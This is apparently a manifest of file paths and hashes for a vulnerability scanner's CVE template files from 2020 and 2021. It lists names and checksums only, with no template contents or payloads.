+http/cves/2020/CVE-2020-8644.yaml:74a82687fabe26e8c2a68333c1fb2d1927d77ff5 +http/cves/2020/CVE-2020-8654.yaml:0331fcc2b6beedaf9abfedb7b5a198eb3b2e81a7 +http/cves/2020/CVE-2020-8771.yaml:86ce53d42936cc827727618908ac6b522aebdffe +http/cves/2020/CVE-2020-8772.yaml:e4875c7a2a78e859e83af04357e241664797eb3f +http/cves/2020/CVE-2020-8813.yaml:946ff12d60d47054ec7e365231bb8c5ccc8253ef +http/cves/2020/CVE-2020-8982.yaml:681a92ab6a1691aaa2e62cee421188adfdc25b5b +http/cves/2020/CVE-2020-9036.yaml:59f314ccaf938c91605047da8f74f12a985f13e0 +http/cves/2020/CVE-2020-9043.yaml:2167088a6631516caa1cdc7d094f9d9ceba74b74 +http/cves/2020/CVE-2020-9047.yaml:2ce6630909968f0d99f6de74df0a339405710cb0 +http/cves/2020/CVE-2020-9054.yaml:adb477f78174836453afa129ec330f68c404074c +http/cves/2020/CVE-2020-9315.yaml:f40ec4c798f492e98bdab9e96f966451c50ca773 +http/cves/2020/CVE-2020-9344.yaml:9101bb34612c239d0fc8d87f40c313e961c4596d +http/cves/2020/CVE-2020-9376.yaml:14f32f6bd2d6db15022c5f491481fc98ceb89d35 +http/cves/2020/CVE-2020-9402.yaml:bdba718cbf2f3760c230e2a353496adb1b0b8b2c +http/cves/2020/CVE-2020-9425.yaml:c9691edd066fc6494c54bcdef2a521fe2f3123c4 +http/cves/2020/CVE-2020-9483.yaml:f9b85f58f952ef21c11aef8a6efeb141b295b621 +http/cves/2020/CVE-2020-9484.yaml:ace32d4fe663b81f235e863d7dcd45a3119ddab9 +http/cves/2020/CVE-2020-9496.yaml:6153af2df6c24dd7fc05ba54bc312713685d6a57 +http/cves/2020/CVE-2020-9757.yaml:bae29ccb592a1270c2592fc2ddfc323e52f27115 +http/cves/2021/CVE-2021-1472.yaml:bc06f0bf4d12abd536e5abd70068210440e62493 +http/cves/2021/CVE-2021-1497.yaml:da2a16e7e0b62b32a28668ff22e26db78957d0a9 +http/cves/2021/CVE-2021-1498.yaml:05ef45232ff166f74d16517368f19b2f88eb3785 +http/cves/2021/CVE-2021-1499.yaml:f2f78401ae2f705ef8ec6f3586f4f2d324fd727d +http/cves/2021/CVE-2021-20031.yaml:f69f325d3b2c88710bb0b6b22c1fadef93665686 +http/cves/2021/CVE-2021-20038.yaml:2d395dd56b113a0a26b11e636142b26fa2d38dcf +http/cves/2021/CVE-2021-20090.yaml:4e3f634be108558c81424d9cdb8f3ee3bc9e820d +http/cves/2021/CVE-2021-20091.yaml:0b3f5079e5d6caf85b136f55376a1246a812c20d +http/cves/2021/CVE-2021-20092.yaml:4d3c4d663cffbd160311095ba1cebf97be539eef +http/cves/2021/CVE-2021-20114.yaml:a745361027edb0a7a2cb79872c94a8c6cf6e9a7c +http/cves/2021/CVE-2021-20123.yaml:7bc4de57846028de9d2b1f8547b45dfb89833788 +http/cves/2021/CVE-2021-20124.yaml:74359a90454d59642591f9fa849f9f0cab945e38 +http/cves/2021/CVE-2021-20137.yaml:462e44d9ef9be98ce8881976f5ea43b63cd0c10c +http/cves/2021/CVE-2021-20150.yaml:1a4228d92b20cebed7ceb45097d7c9ce6c58a0d4 +http/cves/2021/CVE-2021-20158.yaml:0b44379c98592d7a538aaa874c1f814c58dd25b9 +http/cves/2021/CVE-2021-20167.yaml:6a76502c51aaccd6e2f5a6b7fdec0b65396786b4 +http/cves/2021/CVE-2021-20323.yaml:ee3c3b12946e028970f104712c867628af88cf85 +http/cves/2021/CVE-2021-20792.yaml:9a4daa856083db3d3c6d3b6876f7daad453a6725 +http/cves/2021/CVE-2021-20837.yaml:787d7adb13dc2bef743d141b94e1cc4df46c8d9d +http/cves/2021/CVE-2021-21087.yaml:422b24814ad45e4a9a28796263acd3bb6179767e +http/cves/2021/CVE-2021-21234.yaml:cd0672237a2c6f82391fa4882940d9520a6d3df8 +http/cves/2021/CVE-2021-21287.yaml:584840d90cdbbfc1c9da03f63149ba1760445e9d +http/cves/2021/CVE-2021-21307.yaml:6ecb20add9512ffc862d88d729106f71c7e389fe +http/cves/2021/CVE-2021-21311.yaml:963e8fef968f4541c13fba971961cf2595ed99b4 +http/cves/2021/CVE-2021-21315.yaml:4b0c470adb9c7e325bd1ea6ed5b9d1ecd60b1647 +http/cves/2021/CVE-2021-21345.yaml:a59b249b5055152ca7b89ca0026a321b973b1a4c +http/cves/2021/CVE-2021-21351.yaml:92f53891f4baf7673bb271ee0b95cc7d7ca4d643 +http/cves/2021/CVE-2021-21389.yaml:20542ddc6acbd0160d6c1225d891cc1dcb5f4133 +http/cves/2021/CVE-2021-21402.yaml:2c89ccbe5ba7e7d0438dbb896edc1e6d50605964 +http/cves/2021/CVE-2021-21479.yaml:6963bc05dc685ca2e4f0b9aa7fd825106165a32f +http/cves/2021/CVE-2021-21745.yaml:ca9109f940b1b2562fbdbbbb67f837636db1bb33 +http/cves/2021/CVE-2021-21799.yaml:8a01bd4ff1d400af89d71806456dabec50a21ffe +http/cves/2021/CVE-2021-21800.yaml:50a2874947828d9783937f9b53649b5eea5fdc5f +http/cves/2021/CVE-2021-21801.yaml:4497789a3a0c0a7ce23dc5973fb7c6b97b9ef253 +http/cves/2021/CVE-2021-21802.yaml:5e74ebe8c6751b7aeb20b2f5f6fd8b867263550f +http/cves/2021/CVE-2021-21803.yaml:0f89dee7ea7610b3b63e642b157c87098d058646 +http/cves/2021/CVE-2021-21805.yaml:ffb56ca5ed790bb89c33e9af95b90af1bd94bc6f +http/cves/2021/CVE-2021-21816.yaml:98b7641bd6f49df9cb94458922f00f875ab76334 +http/cves/2021/CVE-2021-21881.yaml:954b22491ae97cfa4a36dc12112c11176e7534ed +http/cves/2021/CVE-2021-21972.yaml:835eb54700606e6c4b48317e33ac6e584dcdbb74 +http/cves/2021/CVE-2021-21973.yaml:2e17587bbe390ce4947ea4f3effdfda016fc8e8a +http/cves/2021/CVE-2021-21975.yaml:79387f0f74cf9070d057bcb52826542b17e0acd7 +http/cves/2021/CVE-2021-21978.yaml:7fb5ade66f36ee0158de2bfe1bc018f91ab10b47 +http/cves/2021/CVE-2021-21985.yaml:d547b536718cb733af09eb64d8cb0c1ccc9b9c6e +http/cves/2021/CVE-2021-22005.yaml:908d5947d291d873a853bc45949181235c5f51a0 +http/cves/2021/CVE-2021-22053.yaml:f65bddcf77137c64db9a7bd1cfaf709e6f355b71 +http/cves/2021/CVE-2021-22054.yaml:fa4baa2ba5a0ae0af09a338e509a2a897b9fef5d +http/cves/2021/CVE-2021-22122.yaml:3813fcca33ebef7704f9182e321d91b2e376c14f +http/cves/2021/CVE-2021-22145.yaml:b20a4fdec8aa1fecf4086ae11f990f84c0111651 +http/cves/2021/CVE-2021-22205.yaml:68cc648ea43e99a9c250dfa2bfa8d0adcd86ea14 +http/cves/2021/CVE-2021-22214.yaml:7de8b8db1bdfbee9bea0a33b90053b13ed4a89f3 +http/cves/2021/CVE-2021-22502.yaml:e9d3ba9975ad870b998dadca015d087f55f1d9de +http/cves/2021/CVE-2021-22707.yaml:7ec3d5b2e89e100d7f8ca9eefbb4adb3521e9a5c +http/cves/2021/CVE-2021-22873.yaml:81ae38928acb51535d0d99975ed483c6f8133124 +http/cves/2021/CVE-2021-22911.yaml:4f17932d27d837326339d6df80916e963765600b +http/cves/2021/CVE-2021-22986.yaml:959ce280f19955b65778e09361d823371fbef8ec +http/cves/2021/CVE-2021-23241.yaml:b56322cf75541c5502919d664bfb13b2abfce885 +http/cves/2021/CVE-2021-24145.yaml:5393382627d423814a7e2120c1ac2219b716776b +http/cves/2021/CVE-2021-24146.yaml:612d087e058d632b37c9d9861c63dbf4a4a8eaae +http/cves/2021/CVE-2021-24150.yaml:f42a4cb7c114622adb41636009d05590e2b3384b +http/cves/2021/CVE-2021-24155.yaml:ad2c821546b700b80217f267c10a4dea904ef52d +http/cves/2021/CVE-2021-24165.yaml:a58da7285d708d43800a822267ac4e9d1121d5b2 +http/cves/2021/CVE-2021-24169.yaml:c2f2d47164d0d9ecdce681a4017fe11e9adfed90 +http/cves/2021/CVE-2021-24176.yaml:5be4b201f4b06ea7c0056fa98342f7b97ec7c7d1 +http/cves/2021/CVE-2021-24210.yaml:7e821a71f4b4482181d01d767e86f3e324c2748e +http/cves/2021/CVE-2021-24214.yaml:8074dca57fd51fa0a6cd9ea80d205e3174caecc4 +http/cves/2021/CVE-2021-24226.yaml:3544d2c77e180b7c7584a5fe8b3159089535f8d0 +http/cves/2021/CVE-2021-24227.yaml:cd08805ef4df670aa9430cdaa80cde1e85c6ebcb +http/cves/2021/CVE-2021-24235.yaml:9571e013463652f470de3150ae549e25a7469844 +http/cves/2021/CVE-2021-24236.yaml:86ccedbc0de44a3c5e82dab985dc0f0f8e4703f4 +http/cves/2021/CVE-2021-24237.yaml:182c2c1bfce046cecf790997a26c99cddac4a81e +http/cves/2021/CVE-2021-24239.yaml:81de1758f3f8f0850b925b6b4baad8dd8c9ffef0 +http/cves/2021/CVE-2021-24245.yaml:9ac5de8b85d2f7b97d4cad4f4e68a84980913ab6 +http/cves/2021/CVE-2021-24274.yaml:537d738351d0ed0f53ac579de4e968f54adab879 +http/cves/2021/CVE-2021-24275.yaml:36451d2b321003503f6fc817eb748c12dffb7f5e +http/cves/2021/CVE-2021-24276.yaml:24cdfb1620a0fea595dd12488e11462bd4cfdc73 +http/cves/2021/CVE-2021-24278.yaml:6cc641edcf260499b554e828120c5aab73135565 +http/cves/2021/CVE-2021-24284.yaml:1b288c84d916b8e3b02d8f46c37ca18e41ebfb9a +http/cves/2021/CVE-2021-24285.yaml:89aaf00db0af4ff7feb9935deae9ca35691fa350 +http/cves/2021/CVE-2021-24287.yaml:edd3a858fde8a473ab2ec19f4809500a68e0f5e7 +http/cves/2021/CVE-2021-24288.yaml:945cc2c42ed2469043657c217a2ef726ed4beaf4 +http/cves/2021/CVE-2021-24291.yaml:7385ada990d8f1557bbd3c33280937d22e108e80 +http/cves/2021/CVE-2021-24298.yaml:d4538b5795d0942150119ee5770fb77ec9512caf +http/cves/2021/CVE-2021-24300.yaml:b397b90afec788c6f13a594da14ed064c3029cef +http/cves/2021/CVE-2021-24316.yaml:d92831fc760eea0e377e2b50a220c93d8cefc224 +http/cves/2021/CVE-2021-24320.yaml:d792fd18690f539ff6e3a09eb3c302059c0b8d79 +http/cves/2021/CVE-2021-24335.yaml:092cab2422e11c925cdb7f4046b2cf90c16ab81b +http/cves/2021/CVE-2021-24340.yaml:294c86a15d107812dadc3ecd0e0e0bd0c0e27815 +http/cves/2021/CVE-2021-24342.yaml:ccf9420ba8df376f7bc770483cf82f9e9c24f084 +http/cves/2021/CVE-2021-24347.yaml:606556ed0e56f1ff987dad52d047b2f34852884a +http/cves/2021/CVE-2021-24351.yaml:336b34db36d576771cbcd69925906daa46a807f3 +http/cves/2021/CVE-2021-24358.yaml:ea8ff31be87cf0cec55be70eaba7d43baec34c7d +http/cves/2021/CVE-2021-24364.yaml:3399f4444bab3077e59c529024dec83262d23764 +http/cves/2021/CVE-2021-24370.yaml:d4b6997b1244757a2c1395f66b945d8599f194cf +http/cves/2021/CVE-2021-24387.yaml:7544b4684c4cf8f3fab4e96a70cad73517b4476a +http/cves/2021/CVE-2021-24389.yaml:ffe1a4a6bb2f5c55e2572c31cff0194632e0a0e5 +http/cves/2021/CVE-2021-24406.yaml:b624f55d30e9d29175c9df3a87da6660bb1c998f +http/cves/2021/CVE-2021-24407.yaml:0ff6588a2ca36e849fb023f7fba39d9146ec0d4a +http/cves/2021/CVE-2021-24409.yaml:21640fffafed297487f9c81c617e571f748b4b23 +http/cves/2021/CVE-2021-24435.yaml:4296ce63d92c5bccde9940254355f6811b0c5f29 +http/cves/2021/CVE-2021-24436.yaml:4778f3032531c967145ec8d6bc3848cc2e1d3b0e +http/cves/2021/CVE-2021-24452.yaml:06a966d924425e837d2e62759e02ccc37d6fab95 +http/cves/2021/CVE-2021-24472.yaml:66a84abe52a51f5ba36b7a31f30d5dceb130aace +http/cves/2021/CVE-2021-24488.yaml:ee7d3bf6bb95b7da74459220ade620e32b0468d3 +http/cves/2021/CVE-2021-24495.yaml:9eab131d1d1340bcdbda78658f68c5d397d0d2dd +http/cves/2021/CVE-2021-24498.yaml:08055cab5ce5c7b9b8f67726036558d2daa44605 +http/cves/2021/CVE-2021-24499.yaml:40d8b77eed671980c01a2968ec24de9397905ad6 +http/cves/2021/CVE-2021-24510.yaml:35ef50b8cdf222cf554762acb917b5e20b07e9d2 +http/cves/2021/CVE-2021-24554.yaml:ba4efea67ddc665218a3bf8308e602cb6f4e7f99 +http/cves/2021/CVE-2021-24647.yaml:b5d42e9d783d9d28640b8e4c0d596a659137f2d0 +http/cves/2021/CVE-2021-24666.yaml:8f36db8faa79f14a21b57c9b8cc780ba7b26e1b9 +http/cves/2021/CVE-2021-24731.yaml:c5eefd52fae9e020c6cd396772de31307fda4cba +http/cves/2021/CVE-2021-24746.yaml:0ea857f7ab46d687f0e22640e80c9e72f6295732 +http/cves/2021/CVE-2021-24750.yaml:f7be63f66cfd658277860f95445780cd9864e6b1 +http/cves/2021/CVE-2021-24762.yaml:ee2b120a79c77b8ee49b41a3bfd814b3e893424f +http/cves/2021/CVE-2021-24827.yaml:c7d88c3fae6c3f3b62b3d923d19d8184d284196c +http/cves/2021/CVE-2021-24838.yaml:7e19d027611c371f1ca6a6717496838b168253be +http/cves/2021/CVE-2021-24862.yaml:743e54fdcd9d9ce4080003bf66dac89d4c4423e9 +http/cves/2021/CVE-2021-24875.yaml:6390d5492b89d8bcdc46a0f26f45b27b5d1f4419 +http/cves/2021/CVE-2021-24891.yaml:e5c4fae5fdd586fd818564419d82b7e8cad3e6e0 +http/cves/2021/CVE-2021-24910.yaml:d3052ad62dcaa4a6c8ab879a353eed42dda3b9f3 +http/cves/2021/CVE-2021-24917.yaml:b3524dc68013bb5a75bed920d5db8dce8bae58f8 +http/cves/2021/CVE-2021-24926.yaml:40b37af6b21c78c16bc5594e33a0cf1d863dc2f2 +http/cves/2021/CVE-2021-24931.yaml:c43ef49f0970e0e21aff4e0b880abf50f2c17552 +http/cves/2021/CVE-2021-24940.yaml:e37099380810fbde3dcc5c3e2d3282e7f1dcb708 +http/cves/2021/CVE-2021-24946.yaml:aa953639aaf89e47047520fc150e6f811981ef10 +http/cves/2021/CVE-2021-24947.yaml:e8e865c361b22f4de2ce5cdd05863de9b94580a6 +http/cves/2021/CVE-2021-24956.yaml:eeb0d0eac14004270259efb4639ccff3e858111b +http/cves/2021/CVE-2021-24970.yaml:48660aaf588a701bb89ef9d75856564351de843e +http/cves/2021/CVE-2021-24987.yaml:5e6d38f343c9a84de7d801951f63e39d6ac381b6 +http/cves/2021/CVE-2021-24991.yaml:836939a4acb6fd4418aa3899fe0280c4b25e98b5 +http/cves/2021/CVE-2021-24997.yaml:3d9621a168f9ea814c3a3137fa777c0ff9dd36d4 +http/cves/2021/CVE-2021-25003.yaml:7c407c30039bf25a71eaedcabc4fd8a5d2620561 +http/cves/2021/CVE-2021-25008.yaml:4b2fc6d224af50eca202d82da2c6488627e175a0 +http/cves/2021/CVE-2021-25028.yaml:f26c1b533c512c607ac5d7677c92d0e87b5f2416 +http/cves/2021/CVE-2021-25033.yaml:e906fa3bf2e0ac1af8afc5d4f3993f3fabf79e05 +http/cves/2021/CVE-2021-25052.yaml:0f67a6605ac11d0e55412e6145f6bcc6548be0b8 +http/cves/2021/CVE-2021-25055.yaml:0fbff86ad8885b568d205110c142d3c1266ba002 +http/cves/2021/CVE-2021-25063.yaml:d3f4cd6067936d91e9deb4968e1dde2c7d0f4f02 +http/cves/2021/CVE-2021-25065.yaml:89f761960569982f965dec1af686c0c16948f704 +http/cves/2021/CVE-2021-25067.yaml:f277a9e74843597bcc4a315a520f8abf66db031f +http/cves/2021/CVE-2021-25074.yaml:b2fa5952168bc6f484c50b6d952311353fed2f75 +http/cves/2021/CVE-2021-25075.yaml:a77710dae5376299d74fa03f3ae04f65ba97172d +http/cves/2021/CVE-2021-25078.yaml:5e30713cb621f75e684588621871ca600913e3be +http/cves/2021/CVE-2021-25085.yaml:9e290e1fb13909441de662c410f9031fb3e40b83 +http/cves/2021/CVE-2021-25099.yaml:09af7c609ceb62fd164a5ee32e5a8e6d0a59b94a +http/cves/2021/CVE-2021-25104.yaml:b4efda62a8958cf5e6c4fd80c7c2af8e9b1464c0 +http/cves/2021/CVE-2021-25111.yaml:449ac28d2451018f7f5e9dceed31afe2cffc6872 +http/cves/2021/CVE-2021-25112.yaml:6eee76397aad4174482a3d33ae41d487a971fc0c +http/cves/2021/CVE-2021-25114.yaml:689ca31dd45c49f99250c1d988db39e5b002ad2d +http/cves/2021/CVE-2021-25118.yaml:fb4edc588aa300e3364ed0f606b6e68a2d503632 +http/cves/2021/CVE-2021-25120.yaml:57ad6e828ac60c7afd6b22d6dcde65510108bcf4 +http/cves/2021/CVE-2021-25281.yaml:5ca18d15f38fd13d445e1c58b8b4a46ece434dd0 +http/cves/2021/CVE-2021-25296.yaml:de9b53d257078a98fe9425699abd3dbc43059cfe +http/cves/2021/CVE-2021-25297.yaml:f3ca4513c1490945f4c8026965c235b54d25c9f9 +http/cves/2021/CVE-2021-25298.yaml:0aeb2e7614f299afdb65d0c2525944e12e8b760e +http/cves/2021/CVE-2021-25299.yaml:1e498fc0fe810ae787b861e385c27b2416a9a784 +http/cves/2021/CVE-2021-25646.yaml:eeb7f043790468f2f665ee3d24774e28539d2013 +http/cves/2021/CVE-2021-25864.yaml:4d55fd992a7dfc2aab671c9a57a364287b3cdb37 +http/cves/2021/CVE-2021-25899.yaml:995a6fa0a05edd21a2a7adf33a262948f6b70fbe +http/cves/2021/CVE-2021-26084.yaml:61a95df47fbee4511ab252b46d8710c42b478477 +http/cves/2021/CVE-2021-26085.yaml:8922352188cf0bdd39ce7a23f9aa437dc689dac6 +http/cves/2021/CVE-2021-26086.yaml:4ee3309d4bf7e8618bfbd99ac91b8942c56bb222 +http/cves/2021/CVE-2021-26247.yaml:6efaf564e27d786f4af825198da22432a01e2b47 +http/cves/2021/CVE-2021-26295.yaml:737cca4f9d78376eabaa45dcd7917e2596780a85 +http/cves/2021/CVE-2021-26475.yaml:bae57c3c162918e91fb72aee9b6e22c29f1083cd +http/cves/2021/CVE-2021-26598.yaml:2aa8eb84bc8efe16dc55d37c789ae739ca6445b5 +http/cves/2021/CVE-2021-26702.yaml:d10c6e8213427fe6d3af65f81ebaff0018bf33bf +http/cves/2021/CVE-2021-26710.yaml:c02697403908b44fb9ba13cc17ca386e9dc61636 +http/cves/2021/CVE-2021-26723.yaml:6fb07168e3470dbc7ce1557e48e09827fe061c29 +http/cves/2021/CVE-2021-26812.yaml:aa3d6a7566b0b4eb43cdf61fd947605d565fdf0f +http/cves/2021/CVE-2021-26855.yaml:438b5e2a90ebf968fd2301ce6a0688fc84cb84e0 +http/cves/2021/CVE-2021-27124.yaml:4ae0a0133f0aa6cf3f7312e601430fdabe1bb8cf +http/cves/2021/CVE-2021-27132.yaml:be012223ce98d244b82966396706e699492a0e19 +http/cves/2021/CVE-2021-27309.yaml:4890a8cdf49e982414077f7fb41a74a8a8439dd3 +http/cves/2021/CVE-2021-27310.yaml:4a753bcf4cbb1fe36bd4dd7535e6ec3381951d4e +http/cves/2021/CVE-2021-27314.yaml:a5b55e91c954c7303271ba88c87317919f837b2e +http/cves/2021/CVE-2021-27315.yaml:bc1627b76a426cddcfc5974bc57a2efc00a812c5 +http/cves/2021/CVE-2021-27316.yaml:f1bd6e1542fd9a06fda2b40b461f38d73a66448b +http/cves/2021/CVE-2021-27319.yaml:5545fb90ee149a0399d21e9d2d86aedfcb107445 +http/cves/2021/CVE-2021-27320.yaml:3871928ebed5b2089a82810c9b786476d1e50846 +http/cves/2021/CVE-2021-27330.yaml:1138bd11b6f8fe07e4e77ef467b91640128aaba3 +http/cves/2021/CVE-2021-27358.yaml:56d73e0bd74ed1151ed363a414bfa01587f6b556 +http/cves/2021/CVE-2021-27519.yaml:bc6dcb072cb3e1b29542f17d74c877bef024aa5a +http/cves/2021/CVE-2021-27520.yaml:c729b7a4c3948c8e4c912c5712a07da4b306f027 +http/cves/2021/CVE-2021-27561.yaml:bda606b9e157bbec34e89c67a9856693fb44adbd +http/cves/2021/CVE-2021-27651.yaml:08a0d9408635adfa51a8338fb1488716e9b64c7f +http/cves/2021/CVE-2021-27670.yaml:5e29e3de89b34c2072b098b24dd00ba394482afc +http/cves/2021/CVE-2021-27748.yaml:bace86e2ea9fd7f1d639a67ef3a81d42b3d3f4bb +http/cves/2021/CVE-2021-27850.yaml:f83de5f24579522b6bbc487a1882db9498005b09 +http/cves/2021/CVE-2021-27905.yaml:9ef62df0794a81032926621f274c3748ff0b4d82 +http/cves/2021/CVE-2021-27909.yaml:1ccf0df54c342ad44e5f071835af63d27fe0170f +http/cves/2021/CVE-2021-27931.yaml:3c89d0556f300cf8cb34e6924c5d4d0e13a6d659 +http/cves/2021/CVE-2021-28073.yaml:49810fdb0051c41bbc9bf70621b0622f9529acb0 +http/cves/2021/CVE-2021-28149.yaml:bdea2898f2a3195a5626317c1c9f2483c3340e1d +http/cves/2021/CVE-2021-28150.yaml:bf870d4374497571d56fdcedd6778f808c46ebdd +http/cves/2021/CVE-2021-28151.yaml:b7c52d869999e84b583f2ea0a1288c99d54ab283 +http/cves/2021/CVE-2021-28164.yaml:bc8253973c90c3f70383241f6ff8488e2524851e +http/cves/2021/CVE-2021-28169.yaml:dc09665155441ff22fbac718e80543488f162954 +http/cves/2021/CVE-2021-28377.yaml:741881a551b735d5c2028f7becf3fa028510a204 +http/cves/2021/CVE-2021-28419.yaml:4497bc2044ce940518b6c3420841bc9a8cf6cbac +http/cves/2021/CVE-2021-28854.yaml:661acaf6cc67c8c876543289ccad0effe9b908b4 +http/cves/2021/CVE-2021-28918.yaml:e7b356175157e85db13e6cf09ea4e432f1e06afc +http/cves/2021/CVE-2021-28937.yaml:9753cd42021aa3eb717aa646d9deb6b5e7e41884 +http/cves/2021/CVE-2021-29156.yaml:04285cc19c8703a90f4bff6f2fe04ee92f409e14 +http/cves/2021/CVE-2021-29203.yaml:4c7f7ea0e3d48ab628b4a3cb275570994d6bc140 +http/cves/2021/CVE-2021-29441.yaml:a536206a32cf403a011c23fd55cb685e9e89ffe9 +http/cves/2021/CVE-2021-29442.yaml:4875e3e1709999376bd39372b172f720fbe115c0 +http/cves/2021/CVE-2021-29484.yaml:2d26378f6ca3ff3d47d81c0e886624a9a518201a +http/cves/2021/CVE-2021-29490.yaml:24746e707a71c512b91d44e7a623d77a11f04fac +http/cves/2021/CVE-2021-29505.yaml:2874cb1b0ec0499e61731ccfb18d81ddc9df1273 +http/cves/2021/CVE-2021-29622.yaml:6faa79ce7593b7b1add8bf058d3d8828f1ca0b9b +http/cves/2021/CVE-2021-29625.yaml:4d1ce199073b3fef63cceb41fcb44ab1b3be1315 +http/cves/2021/CVE-2021-3002.yaml:a73dc103736f974051919e32faa1f2acb9eff895 +http/cves/2021/CVE-2021-30049.yaml:f94c6b3847495ea04b16f475d5847b457ae143cc +http/cves/2021/CVE-2021-30128.yaml:a7d1a5211417c028b4610808272467aaf173dd3a +http/cves/2021/CVE-2021-30134.yaml:de9fe443f126cb4a142f3c2bb4697461a7c8607d +http/cves/2021/CVE-2021-30151.yaml:289db5462434ec1643dca929caf92a1a1965c958 +http/cves/2021/CVE-2021-3017.yaml:d745e98128ca4afe20de63b7ebc8f4fe0b39e0ff +http/cves/2021/CVE-2021-30175.yaml:b2ff6fd1635228a416888cc7f65b7d2de9896cd8 +http/cves/2021/CVE-2021-3019.yaml:c33f2b671ccdb3318b98c8172db588192c6fed28 +http/cves/2021/CVE-2021-30213.yaml:371d6bef4ed59e9bc0a9d1c96097d6fea898d869 +http/cves/2021/CVE-2021-30461.yaml:b854badbb698b79d9b969da22d402120b711f5d5 +http/cves/2021/CVE-2021-30497.yaml:a30f758db8fbbcb11913527752adbf3f1138e731 +http/cves/2021/CVE-2021-3110.yaml:e14be833257673dc0c63a7071edae7b116cebb6d +http/cves/2021/CVE-2021-31195.yaml:d185281726deb825c0579f8707fc63c00222c9c5 +http/cves/2021/CVE-2021-31249.yaml:2b44ff5be077d92fe02bc326b4729ab812aa8ada +http/cves/2021/CVE-2021-31250.yaml:f2cead4cb7a65e80a91b7a8ebbb07d38269868f0 +http/cves/2021/CVE-2021-3129.yaml:abaf6a818fee78b897708f062a1502bf42107045 +http/cves/2021/CVE-2021-31537.yaml:ad54cd9c82b7e5de8549c743bcbb708fc5d96550 +http/cves/2021/CVE-2021-31581.yaml:2b0967eeec8615aa33638b0ed08c70c443c7787d +http/cves/2021/CVE-2021-31589.yaml:c25c79959affbbd02bc084c6cb53c86b9e1967ed +http/cves/2021/CVE-2021-31602.yaml:add0d7f8c76798f776dc23198b7895c59a90efdf +http/cves/2021/CVE-2021-31682.yaml:f2624d61716f97733f8d6672a3018346b786ed22 +http/cves/2021/CVE-2021-31755.yaml:588ce59015bbe40b6f4cf37ad526eb85b1ddd554 +http/cves/2021/CVE-2021-31805.yaml:f3d8bca3f01fc6845bd4d1ab45d7cc836e588176 +http/cves/2021/CVE-2021-31856.yaml:63a732da2381feb45937df2ea4fb2d97ca1b230f +http/cves/2021/CVE-2021-31862.yaml:9df4cc8e1ebc3ac512591f02a8e0cf3907ba7342 +http/cves/2021/CVE-2021-32030.yaml:145f6687ddc55aa14cab92aba98ee00a93daaa05 +http/cves/2021/CVE-2021-32172.yaml:8c4171d06fcbe9a2623517bc23754e9055bd3085 +http/cves/2021/CVE-2021-3223.yaml:e12d4fe0aac0568ce4342e6a0671a7f71119d6da +http/cves/2021/CVE-2021-32305.yaml:e32d24d73a7793fbdcb86ef264be1c04d5b90750 +http/cves/2021/CVE-2021-32618.yaml:24714214b07b23b56635d3af3f4385a709fccc1e +http/cves/2021/CVE-2021-32682.yaml:dbc567cddbe5ace9da05bca3347c054cf2430886 +http/cves/2021/CVE-2021-32789.yaml:7df42a6f562ca789097d9c835bfca04e3ca52da3 +http/cves/2021/CVE-2021-32819.yaml:8b8c5517f8c81a61b1b2be04d5c9517a63f21af2 +http/cves/2021/CVE-2021-32820.yaml:0faf5402e6aee088e31f4b695fc1d1d59eefca32 +http/cves/2021/CVE-2021-32853.yaml:e8d62110f9ec97b7f4c06e70081581e5a8c8c312 +http/cves/2021/CVE-2021-3293.yaml:e56df85ba08cbc27a866d9b75cd75ce1c7e57b9a +http/cves/2021/CVE-2021-3297.yaml:3bfaf6d778c04a00894ec2d66fbd6bfd52a74017 +http/cves/2021/CVE-2021-33044.yaml:7505c04b5a815c29f98829c7ff82543d078f68ff +http/cves/2021/CVE-2021-33221.yaml:a3291afaa2b9adf0ac7f3f1b833d404e86ebf257 +http/cves/2021/CVE-2021-33357.yaml:7d9216fe268ff4cce962f30454d2e6563093055c +http/cves/2021/CVE-2021-33544.yaml:e9c5c367ddfee3f3ab6eb8e10cfe7e3ca5bf6497 +http/cves/2021/CVE-2021-33564.yaml:ae07abbe4c12e448c2583d0dc64416a9337007d6 +http/cves/2021/CVE-2021-3374.yaml:fc73b25d1cfc1573a4da98fbc091a66fc2654976 +http/cves/2021/CVE-2021-3377.yaml:ad20849d60180a467d43fb5de3ff76ec2eff6b5a +http/cves/2021/CVE-2021-3378.yaml:523c6f487d50f63dc9f8ebd186a4708a46191aba +http/cves/2021/CVE-2021-33807.yaml:14030ebe73f5378634f50b1860c9406bb5c22553 +http/cves/2021/CVE-2021-33851.yaml:3dfc35e4d7673c3da12b2df564ce4860e72d885c +http/cves/2021/CVE-2021-33904.yaml:9f0d0daea619ed16e852a52f4e7ad6ff261bcd94 +http/cves/2021/CVE-2021-34370.yaml:5e79f6c9eae83559b4a65bb046b22626214b0ad9 +http/cves/2021/CVE-2021-34429.yaml:2e79e07654eb328fff4da7972ae9d53fab42e01e +http/cves/2021/CVE-2021-34473.yaml:6033651c7d1b24b424c31d6c04242bf13c4b0430 +http/cves/2021/CVE-2021-34621.yaml:5a01b11fb559ba5b56c8e5dcebae7c783c8d5617 +http/cves/2021/CVE-2021-34640.yaml:6b95de7e73a2e7e9b2ab2d658c699c32f12c04b7 +http/cves/2021/CVE-2021-34643.yaml:f3159f4cf9122c459724fea6a7ac6e1840130a5e +http/cves/2021/CVE-2021-34805.yaml:002c4c01fa270658328359a9462d97a20977155d +http/cves/2021/CVE-2021-35250.yaml:90c6aaf2f33a34399462f56742d400f166e5201d +http/cves/2021/CVE-2021-35265.yaml:cb9ab796110b72faf9e8a0058e2002e718495f96 +http/cves/2021/CVE-2021-35336.yaml:fde55fc4d7723a2d3b9fc50a225cc3b6f4045cfe +http/cves/2021/CVE-2021-35380.yaml:d7a9289b9536efb1d03549e1a0aa206b0a060f68 +http/cves/2021/CVE-2021-35464.yaml:aa840ddee6dec7485f1524268711cc17fc353ca3 +http/cves/2021/CVE-2021-35488.yaml:0cae67d39022f951e97ac18e2ac86f2bb1be8523 +http/cves/2021/CVE-2021-35587.yaml:a8d802c61a2f2f5b3d99eabb61423d8a03262c4d +http/cves/2021/CVE-2021-3577.yaml:8618df670def9f9d7cf611b325ad7dabceefd35a +http/cves/2021/CVE-2021-36260.yaml:4b8940c7d8061e535b59d9e106a1aeb9b8e976db +http/cves/2021/CVE-2021-36356.yaml:de7d99a5e7c554def62dfedc5cffdd3e2ceb4e75 +http/cves/2021/CVE-2021-36380.yaml:b0ec9ca25fc696debcd6fe8764e06488774a5c21 +http/cves/2021/CVE-2021-36450.yaml:66247c208b148d3673c37e4c68dae120f568c216 +http/cves/2021/CVE-2021-3654.yaml:0b22df45bf72d52aa691ecf84451c155940abb06 